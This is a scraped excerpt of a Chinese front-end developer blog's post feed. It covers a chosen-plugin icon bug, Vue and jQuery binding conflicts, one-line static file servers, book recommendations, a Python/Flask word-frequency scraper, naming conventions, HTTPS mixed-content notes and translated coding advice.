不知道为什么,这个多选框上面的图标不见了。我找了半天没有找到原因,然后我把我的机器的内网地址给我同事,让他访问我机器,当它访问到这个页面时。他的电脑上居然显示出了这个下拉框的图标。\n这是什么鬼?, 为什么同样的代码,在我的电脑上显示不出图标,但是在他的电脑上可以显示。有句名言说的好:没有什么bug是一遍调试解决不了的,如果有,就再仔细调试一遍。于是我就再次调试一遍。\n我发现了一些第一遍没有注意到的东西媒体查询,就是在css里有这样的语句:\n@media 从这里作为切入口,我发现:媒体查询的类会覆盖它原生的类的属性\n由于我的电脑视网膜屏幕,分辨率比较高,触发了媒体查询,这就导致了媒体查询的类覆盖了原生的类。而覆盖后的类,使用了chosen-sprite@2x.png作为图标的背景图片。但是这个图片并没有被放在这个插件的目录下,有的只有chosen-sprite.png这个图片。在一般情况下,都是用chosen-sprite.png作为背景图片的。这就解释了:为什么同事的电脑上出现了图标,但是我的电脑上没有出现这个图标。\n总结: 如果你要使用一个插件,你最好把这个插件的所有文件都放在同一个目录下。而不要只放一些你认为有用的文件。最后:媒体查询的相关知识也是必要的。\n2. 问题2:jQuery 与 Vue之间的暧昧 jQuery流派代表着直接操纵DOM的流派,Vue流派代表着操纵数据的流派。\n如果在项目里,你使用了一些jQuery插件,也使用了Vue,这就可能导致一些问题。\n举个例子:\n\u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/vue/2.4.4/vue.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; 姓名 \u0026lt;input type=\u0026#34;text\u0026#34; v-model=\u0026#34;userName\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; 年龄 \u0026lt;input type=\u0026#34;text\u0026#34; id=\u0026#34;userAge\u0026#34; v-model=\u0026#34;userAge\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; new Vue({ el: \u0026#39;#app\u0026#39;, data: { userName: \u0026#39;\u0026#39;, userAge: 12 } }); $(\u0026#39;#userAge\u0026#39;).val(14); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 在页面刚打开时:姓名输入框是空的,年龄输入框是14。但是一旦你在姓名输入框输入任何字符时,年龄输入框的值就会变成12。\n如果你仔细看过Vue官方文档,你会很容易定位问题所在。\nv-model 会忽略所有表单元素的 value、checked、selected 特性的初始值。因为它会选择 Vue 实例数据来作为具体的值。你应该通过 JavaScript 在组件的 data 选项中声明初始值。---Vue官方文档 你可以用 v-model 指令在表单控件元素上创建双向数据绑定。它会根据控件类型自动选取正确的方法来更新元素。尽管有些神奇,但 v-model 本质上不过是语法糖,它负责监听用户的输入事件以更新数据,并特别处理一些极端的例子。\n当userAge被jQuery改成14时,Vue实例中的userAge任然是12。当你输入userName时,Vue发现数据改变,触发虚拟DOM的重新渲染,同时也将userAge渲染成了12。\n总结:如果你在Vue项目中逼不得已使用jQuery, 你要知道这会导致哪些常见的问题,以及解决思路。\n3. 最后 我苦苦寻找诡异的bug原因,其实是我的无知。\n","permalink":"https://wdd.js.org/posts/2019/10/qmgxqm/","summary":"1. 问题1:chosen插件无法显示图标 问题现象在我本地调试的时候,我使用了一个多选下拉框的插件,就是chosen, 不知道为什么,这个多选框上面的图标不见了。我找了半天没有找到原因,然后我把我的机器的内网地址给我同事,让他访问我机器,当它访问到这个页面时。他的电脑上居然显示出了这个下拉框的图标。\n这是什么鬼?, 为什么同样的代码,在我的电脑上显示不出图标,但是在他的电脑上可以显示。有句名言说的好:没有什么bug是一遍调试解决不了的,如果有,就再仔细调试一遍。于是我就再次调试一遍。\n我发现了一些第一遍没有注意到的东西媒体查询,就是在css里有这样的语句:\n@media 从这里作为切入口,我发现:媒体查询的类会覆盖它原生的类的属性\n由于我的电脑视网膜屏幕,分辨率比较高,触发了媒体查询,这就导致了媒体查询的类覆盖了原生的类。而覆盖后的类,使用了chosen-sprite@2x.png作为图标的背景图片。但是这个图片并没有被放在这个插件的目录下,有的只有chosen-sprite.png这个图片。在一般情况下,都是用chosen-sprite.png作为背景图片的。这就解释了:为什么同事的电脑上出现了图标,但是我的电脑上没有出现这个图标。\n总结: 如果你要使用一个插件,你最好把这个插件的所有文件都放在同一个目录下。而不要只放一些你认为有用的文件。最后:媒体查询的相关知识也是必要的。\n2. 问题2:jQuery 与 Vue之间的暧昧 jQuery流派代表着直接操纵DOM的流派,Vue流派代表着操纵数据的流派。\n如果在项目里,你使用了一些jQuery插件,也使用了Vue,这就可能导致一些问题。\n举个例子:\n\u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/vue/2.4.4/vue.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; 姓名 \u0026lt;input type=\u0026#34;text\u0026#34; v-model=\u0026#34;userName\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; 年龄 \u0026lt;input type=\u0026#34;text\u0026#34; id=\u0026#34;userAge\u0026#34; v-model=\u0026#34;userAge\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; new Vue({ el: \u0026#39;#app\u0026#39;, data: { userName: \u0026#39;\u0026#39;, userAge: 12 } }); $(\u0026#39;#userAge\u0026#39;).val(14); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 在页面刚打开时:姓名输入框是空的,年龄输入框是14。但是一旦你在姓名输入框输入任何字符时,年龄输入框的值就会变成12。\n如果你仔细看过Vue官方文档,你会很容易定位问题所在。\nv-model 会忽略所有表单元素的 value、checked、selected 特性的初始值。因为它会选择 Vue 实例数据来作为具体的值。你应该通过 JavaScript 在组件的 data 选项中声明初始值。---Vue官方文档 你可以用 v-model 指令在表单控件元素上创建双向数据绑定。它会根据控件类型自动选取正确的方法来更新元素。尽管有些神奇,但 v-model 本质上不过是语法糖,它负责监听用户的输入事件以更新数据,并特别处理一些极端的例子。","title":"我苦苦寻找诡异的bug原因,其实是我的无知"},{"content":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET /favicon.ico HTTP/1.1\u0026#34; 404 - 2. 基于nodejs 首先你要安装nodejs\n2.1. http-server // 安装 npm install http-server -g // 用法 http-server [path] [options] 2.2. serve // 安装 npm install -g serve // 用法 serve [options] \u0026lt;path\u0026gt; 2.3. webpack-dev-server // 安装 npm install webpack-dev-server -g // 用法 webpack-dev-server 2.4. anywhere // 安装 npm install -g anywhere // 用法 anywhere anywhere -p port 2.5. puer // 安装 npm -g install puer // 使用 puer - 提供一个当前或指定路径的静态服务器 - 所有浏览器的实时刷新:编辑css实时更新(update)页面样式,其它文件则重载(reload)页面 - 提供简单熟悉的mock请求的配置功能,并且配置也是自动更新。 - 可用作代理服务器,调试开发既有服务器的页面,可与mock功能配合使用 - 集成了weinre,并提供二维码地址,方便移动端的调试 - 可以作为connect中间件使用(前提是后端为nodejs,否则请使用代理模式) ","permalink":"https://wdd.js.org/posts/2019/10/hvqggd/","summary":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.","title":"一行命令搭建简易静态文件http服务器"},{"content":"1. Front-End Developer Handbook 2017 地址:https://frontendmasters.com/books/front-end-handbook/2017/ 这是任何人都可以用来了解前端开发实践的指南。它大致概述并讨论了前端工程的实践:如何学习它,以及在2017年实践时使用什么工具。\n这是专门为潜在的和目前实践的前端开发人员提供专业资源,以配备学习材料和开发工具。其次,管理者,首席技术官,导师和猎头人士可以使用它来了解前端开发的实践。\n手册的内容有利于网络技术(HTML,CSS,DOM和JavaScript)以及直接构建在这些开放技术之上的解决方案。本书中引用和讨论的材料是课堂上最好的或目前提出的问题。\n该书不应被视为对前端开发人员可用的所有资源的全面概述。这本书的价值被简单,集中和及时地组织起来,仅仅是足够的绝对信息,以免任何人在任何一个特定的主题上压倒一切。\n目的是每年发布一次内容更新。\n手册分为三部分。\n第一部分。前端实践\n第一部分广泛描述了前端工程的实践。\n第二部分:学习前端发展\n第二部分指出了自主导向和直接的资源,用于学习成为前端开发人员。\n第三部分:前端开发工具\n第三部分简要解释和识别交易工具。\n2. JS函数式编程指南 英文版地址: 中文版地址:https://llh911001.gitbooks.io/mostly-adequate-guide-chinese/content/\n这本书的主题是函数范式(functional paradigm),我们将使用 JavaScript 这个世界上最流行的函数式编程语言来讲述这一主题。有人可能会觉得选择 JavaScript 并不明智,因为当前的主流观点认为它是一门命令式(imperative)的语言,并不适合用来讲函数式。但我认为,这是学习函数式编程的最好方式,因为:\n你很有可能在日常工作中使用它\n这让你有机会在实际的编程过程中学以致用,而不是在空闲时间用一门深奥的函数式编程语言做一些玩具性质的项目。\n你不必从头学起就能开始编写程序\n在纯函数式编程语言中,你必须使用 monad 才能打印变量或者读取 DOM 节点。JavaScript 则简单得多,可以作弊走捷径,因为毕竟我们的目的是学写纯函数式代码。JavaScript 也更容易入门,因为它是一门混合范式的语言,你随时可以在感觉吃力的时候回退到原有的编程习惯上去。\n这门语言完全有能力书写高级的函数式代码\n只需借助一到两个微型类库,JavaScript 就能模拟 Scala 或 Haskell 这类语言的全部特性。虽然面向对象编程(Object-oriented programing)主导着业界,但很明显这种范式在 JavaScript 里非常笨拙,用起来就像在高速公路上露营或者穿着橡胶套鞋跳踢踏舞一样。我们不得不到处使用 bind 以免 this 不知不觉地变了,语言里没有类可以用(目前还没有),我们还发明了各种变通方法来应对忘记调用 new 关键字后的怪异行为,私有成员只能通过闭包(closure)才能实现,等等。对大多数人来说,函数式编程看起来更加自然。+\n以上说明,强类型的函数式语言毫无疑问将会成为本书所示范式的最佳试验场。JavaScript 是我们学习这种范式的一种手段,将它应用于什么地方则完全取决于你自己。幸运的是,所有的接口都是数学的,因而也是普适的。最终你会发现你习惯了 swiftz、scalaz、haskell 和 purescript,以及其他各种数学偏向的语言。\n3. 前端开发笔记本 地址:http://chanshuyi.github.io/frontend_notebook/\n前端开发笔记本涵括了大部分前端开发所需的知识点,主要包括5大部分:《页面制作》、《JavaScript程序设计》、《DOM编程》、《页面架构》、《前端产品架构》。\n","permalink":"https://wdd.js.org/fe/gitbook-good-book/","summary":"1. Front-End Developer Handbook 2017 地址:https://frontendmasters.com/books/front-end-handbook/2017/ 这是任何人都可以用来了解前端开发实践的指南。它大致概述并讨论了前端工程的实践:如何学习它,以及在2017年实践时使用什么工具。\n这是专门为潜在的和目前实践的前端开发人员提供专业资源,以配备学习材料和开发工具。其次,管理者,首席技术官,导师和猎头人士可以使用它来了解前端开发的实践。\n手册的内容有利于网络技术(HTML,CSS,DOM和JavaScript)以及直接构建在这些开放技术之上的解决方案。本书中引用和讨论的材料是课堂上最好的或目前提出的问题。\n该书不应被视为对前端开发人员可用的所有资源的全面概述。这本书的价值被简单,集中和及时地组织起来,仅仅是足够的绝对信息,以免任何人在任何一个特定的主题上压倒一切。\n目的是每年发布一次内容更新。\n手册分为三部分。\n第一部分。前端实践\n第一部分广泛描述了前端工程的实践。\n第二部分:学习前端发展\n第二部分指出了自主导向和直接的资源,用于学习成为前端开发人员。\n第三部分:前端开发工具\n第三部分简要解释和识别交易工具。\n2. JS函数式编程指南 英文版地址: 中文版地址:https://llh911001.gitbooks.io/mostly-adequate-guide-chinese/content/\n这本书的主题是函数范式(functional paradigm),我们将使用 JavaScript 这个世界上最流行的函数式编程语言来讲述这一主题。有人可能会觉得选择 JavaScript 并不明智,因为当前的主流观点认为它是一门命令式(imperative)的语言,并不适合用来讲函数式。但我认为,这是学习函数式编程的最好方式,因为:\n你很有可能在日常工作中使用它\n这让你有机会在实际的编程过程中学以致用,而不是在空闲时间用一门深奥的函数式编程语言做一些玩具性质的项目。\n你不必从头学起就能开始编写程序\n在纯函数式编程语言中,你必须使用 monad 才能打印变量或者读取 DOM 节点。JavaScript 则简单得多,可以作弊走捷径,因为毕竟我们的目的是学写纯函数式代码。JavaScript 也更容易入门,因为它是一门混合范式的语言,你随时可以在感觉吃力的时候回退到原有的编程习惯上去。\n这门语言完全有能力书写高级的函数式代码\n只需借助一到两个微型类库,JavaScript 就能模拟 Scala 或 Haskell 这类语言的全部特性。虽然面向对象编程(Object-oriented programing)主导着业界,但很明显这种范式在 JavaScript 里非常笨拙,用起来就像在高速公路上露营或者穿着橡胶套鞋跳踢踏舞一样。我们不得不到处使用 bind 以免 this 不知不觉地变了,语言里没有类可以用(目前还没有),我们还发明了各种变通方法来应对忘记调用 new 关键字后的怪异行为,私有成员只能通过闭包(closure)才能实现,等等。对大多数人来说,函数式编程看起来更加自然。+\n以上说明,强类型的函数式语言毫无疑问将会成为本书所示范式的最佳试验场。JavaScript 是我们学习这种范式的一种手段,将它应用于什么地方则完全取决于你自己。幸运的是,所有的接口都是数学的,因而也是普适的。最终你会发现你习惯了 swiftz、scalaz、haskell 和 purescript,以及其他各种数学偏向的语言。\n3. 前端开发笔记本 地址:http://chanshuyi.github.io/frontend_notebook/\n前端开发笔记本涵括了大部分前端开发所需的知识点,主要包括5大部分:《页面制作》、《JavaScript程序设计》、《DOM编程》、《页面架构》、《前端产品架构》。","title":"Gitbook好书推荐"},{"content":"1. 环境 win7 64位 python 3.5 2. 目标 抓取一篇报纸,并提取出关键字,然后按照出现次数排序,用echarts在页面上显示出来。\n3. 工具选择 因为之前对nodejs的相关工具比较熟悉,在用python的时候,也想有类似的工具。所以就做了一个对比的表格。\n功能 nodejs版 python版 http工具 request requests 中文分词工具 node-segment, nodejieba(一直没有安装成功过) jieba(分词准确度比node-segment好) DOM解析工具 cheeio pyquery(这两个工具都是有类似jQuery那种选择DOM的接口,很方便) 函数编程工具 underscore.js underscore.py(underscore来处理集合比较方便) 服务器 express flask 4. 开始的噩梦:中文乱码 感觉每个学python的人都遇到过中文乱码的问题。我也不例外。\n首先要抓取网页,但是网页在控制台输出的时候,中文总是乱码。搞了好久,搞得我差点要放弃python。最终找到解决方法。 解决python3 UnicodeEncodeError: \u0026lsquo;gbk\u0026rsquo; codec can\u0026rsquo;t encode character \u0026lsquo;\\xXX\u0026rsquo; in position XX\n过程很艰辛,但是从中也学到很多知识。\nimport io import sys sys.stdout = io.TextIOWrapper(sys.stoodout.buffer,encoding=\u0026#39;gb18030\u0026#39;) 5. 函数式编程: 顺享丝滑 #filename word_rank.py import requests import io import re import sys import jieba as _jieba # 中文分词比较优秀的一个库 from pyquery import PyQuery as pq #类似于jquery、cheerio的库 from underscore import _ # underscore.js python版本 sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding=\u0026#39;gb18030\u0026#39;) # 解决控制台中文乱码 USELESSWORDS = [\u0026#39;的\u0026#39;,\u0026#39;要\u0026#39;,\u0026#39;了\u0026#39;,\u0026#39;在\u0026#39;,\u0026#39;和\u0026#39;,\u0026#39;是\u0026#39;,\u0026#39;把\u0026#39;,\u0026#39;向\u0026#39;,\u0026#39;上\u0026#39;,\u0026#39;为\u0026#39;,\u0026#39;等\u0026#39;,\u0026#39;个\u0026#39;] # 标记一些无用的单词 TOP = 30 # 只要前面的30个就可以了 def _remove_punctuation(line): # 移除非中文字符 # rule = re.compile(\u0026#34;[^a-zA-Z0-9\\u4e00-\\u9fa5]\u0026#34;) rule = re.compile(\u0026#34;[^\\u4e00-\\u9fa5]\u0026#34;) line = rule.sub(\u0026#39;\u0026#39;,line) return line def _calculate_frequency(words): # 计算分词出现的次数 result = {} res = [] for word in words: if result.get(word, -1) == -1: result[word] = 1 else: result[word] += 1 for word in result: if _.contains(USELESSWORDS, word): # 排除无用的分词 continue res.append({ \u0026#39;word\u0026#39;: word, \u0026#39;fre\u0026#39;: result[word] }) return _.sortBy(res, \u0026#39;fre\u0026#39;)[::-1][:TOP] # 降序排列 def _get_page(url): # 获取页面 return requests.get(url) def _get_text(req): # 获取文章部分 return pq(req.content)(\u0026#39;#ozoom\u0026#39;).text() def main(url): # 入口函数,函数组合 return _.compose( _get_page, _get_text, _remove_punctuation, _jieba.cut, _calculate_frequency )(url) 6. python服务端:Flask浅入浅出 import word_rank from flask import Flask, request, jsonify, render_template app = Flask(__name__) app.debug = True @app.route(\u0026#39;/rank\u0026#39;) # 从query参数里获取pageUrl,并给分词排序 def getRank(): pageUrl = request.args.get(\u0026#39;pageUrl\u0026#39;) app.logger.debug(pageUrl) rank = word_rank.main(pageUrl) app.logger.debug(rank) return jsonify(rank) @app.route(\u0026#39;/\u0026#39;) # 主页面 def getHome(): return render_template(\u0026#39;home.html\u0026#39;) if __name__ == \u0026#39;__main__\u0026#39;: app.run() 7. 总结 据说有个定律:凡是能用JavaScript写出来的,最终都会用JavaScript写出来。 我是很希望这样啦。但是不得不承认,python上有很多非常优秀的库。这些库在npm上并没有找到合适的替代品。\n所以,我就想: 如何能用nodejs直接调用python的第三方库\n目前的解决方案有两种,第一,只用nodejs的child_processes。这个方案我试过,但是不太好用。\n第二,npm里面有一些包,可以直接调用python的库。例如:node-python, python.js, 但是这些包我在win7上安装的时候总是报错。而且解决方法也蛮麻烦的。索性我就直接用python了。\n最后附上项目地址:https://github.com/wangduanduan/read-newspaper\n","permalink":"https://wdd.js.org/posts/2019/10/rmsqoa/","summary":"1. 环境 win7 64位 python 3.5 2. 目标 抓取一篇报纸,并提取出关键字,然后按照出现次数排序,用echarts在页面上显示出来。\n3. 工具选择 因为之前对nodejs的相关工具比较熟悉,在用python的时候,也想有类似的工具。所以就做了一个对比的表格。\n功能 nodejs版 python版 http工具 request requests 中文分词工具 node-segment, nodejieba(一直没有安装成功过) jieba(分词准确度比node-segment好) DOM解析工具 cheeio pyquery(这两个工具都是有类似jQuery那种选择DOM的接口,很方便) 函数编程工具 underscore.js underscore.py(underscore来处理集合比较方便) 服务器 express flask 4. 开始的噩梦:中文乱码 感觉每个学python的人都遇到过中文乱码的问题。我也不例外。\n首先要抓取网页,但是网页在控制台输出的时候,中文总是乱码。搞了好久,搞得我差点要放弃python。最终找到解决方法。 解决python3 UnicodeEncodeError: \u0026lsquo;gbk\u0026rsquo; codec can\u0026rsquo;t encode character \u0026lsquo;\\xXX\u0026rsquo; in position XX\n过程很艰辛,但是从中也学到很多知识。\nimport io import sys sys.stdout = io.TextIOWrapper(sys.stoodout.buffer,encoding=\u0026#39;gb18030\u0026#39;) 5. 函数式编程: 顺享丝滑 #filename word_rank.py import requests import io import re import sys import jieba as _jieba # 中文分词比较优秀的一个库 from pyquery import PyQuery as pq #类似于jquery、cheerio的库 from underscore import _ # underscore.","title":"python实战 报纸分词排序"},{"content":"在小朱元璋出生一个月后,父母为他取了一个名字(元时惯例):朱重八,这个名字也可以叫做朱八八。我们这里再介绍一下,朱重八家族的名字,都很有特点。\n朱重八高祖名字:朱百六; 朱重八曾祖名字:朱四九; 朱重八祖父名字:朱初一; 他的父亲我们介绍过了,叫朱五四。 取这样的名字不是因为朱家是搞数学的,而是因为在元朝,老百姓如果不能上学和当官就没有名字,只能以父母年龄相加或者出生的日期命名。(登记户口的人一定会眼花)\u0026ndash;《明朝那些事儿》\n那么问题来了,朱四九和朱百六是什么关系? 你可能马上懵逼了。所以说:命名不仅仅是一种科学,更是一种艺术。\n1. 名副其实 // bad var d; // 分手的时间,以天计算 // good var daysAfterBrokeUp; // 分手以后,以天计算 2. 避免误导 // bad var nameList = \u0026#39;wdd\u0026#39;; // List一般暗指数据是数组,而不应该赋值给字符串 // good var nameList = [\u0026#39;wdd\u0026#39;,\u0026#39;ddw\u0026#39;,\u0026#39;dwd\u0026#39;]; // // bad var ill10o = 10; //千万不要把i,1,l,0,o,O放在一起,傻傻分不清楚 // good var illOne = 10; 3. 做有意义的区分 // bad var userData, userInfo; // Data和Info, 有什么区别????, 不要再用data和info这样模糊不清的单词了 // good var userProfile, userAcount 4. 使用读得出来的名称 // bad var beeceearrthrtee; // 你知道怎么读吗? 鼻涕阿三?? // good var userName; 5. 使用可搜索的名称 // bad var e = \u0026#39;not found\u0026#39;; // 想搜e, 就很难搜 // good var ERROR_NO_FOUND = \u0026#39;not found\u0026#39;; 6. 方法名一概是动词短语 // good function createAgent(){} funtion deleteAgent(){} function updateAgent(){} function queryAgent(){} 7. 尽量不要用单字母名称, 除了用于循环 // bad var i = 1; // good for(var i=0; i\u0026lt;10; i++){ ... } // very good userList.forEach(function(user){ ... }); 8. 每个概念对应一个词 controller和manager, 没什么区别,要用controller都用controller, 要用manager都用manager, 不要混着用 9. 建立项目词汇表, 不要随意创造名称 user, agent, org, queue, activity, device... 10. 参考资料 《代码整洁之道》 《明朝那些事儿》 ","permalink":"https://wdd.js.org/posts/2019/10/ouvbom/","summary":"在小朱元璋出生一个月后,父母为他取了一个名字(元时惯例):朱重八,这个名字也可以叫做朱八八。我们这里再介绍一下,朱重八家族的名字,都很有特点。\n朱重八高祖名字:朱百六; 朱重八曾祖名字:朱四九; 朱重八祖父名字:朱初一; 他的父亲我们介绍过了,叫朱五四。 取这样的名字不是因为朱家是搞数学的,而是因为在元朝,老百姓如果不能上学和当官就没有名字,只能以父母年龄相加或者出生的日期命名。(登记户口的人一定会眼花)\u0026ndash;《明朝那些事儿》\n那么问题来了,朱四九和朱百六是什么关系? 你可能马上懵逼了。所以说:命名不仅仅是一种科学,更是一种艺术。\n1. 名副其实 // bad var d; // 分手的时间,以天计算 // good var daysAfterBrokeUp; // 分手以后,以天计算 2. 避免误导 // bad var nameList = \u0026#39;wdd\u0026#39;; // List一般暗指数据是数组,而不应该赋值给字符串 // good var nameList = [\u0026#39;wdd\u0026#39;,\u0026#39;ddw\u0026#39;,\u0026#39;dwd\u0026#39;]; // // bad var ill10o = 10; //千万不要把i,1,l,0,o,O放在一起,傻傻分不清楚 // good var illOne = 10; 3. 做有意义的区分 // bad var userData, userInfo; // Data和Info, 有什么区别????, 不要再用data和info这样模糊不清的单词了 // good var userProfile, userAcount 4. 使用读得出来的名称 // bad var beeceearrthrtee; // 你知道怎么读吗? 鼻涕阿三?? // good var userName; 5.","title":"代码整洁之道 - 有意义的命名"},{"content":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. HTTPS的默认端口是443,而不是443 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。\n","permalink":"https://wdd.js.org/network/of5hny/","summary":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. HTTPS的默认端口是443,而不是443 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。","title":"可能被遗漏的https与http的知识点"},{"content":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也以是坏的。您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将是只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 当你累了或在一个坏的心情不要写代码。 当开发人员厌倦时,他们正在制造2到5倍或者更多的bug。所以工作更多是非常糟糕的做法。这就是为什么越来越多的国家思考6小时工作日,其中一些已经有了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码分析和预测之前,您的客户/客户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是腰部时间和资源对不合理的愿望和牺牲与质量。\n11. 自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟_ 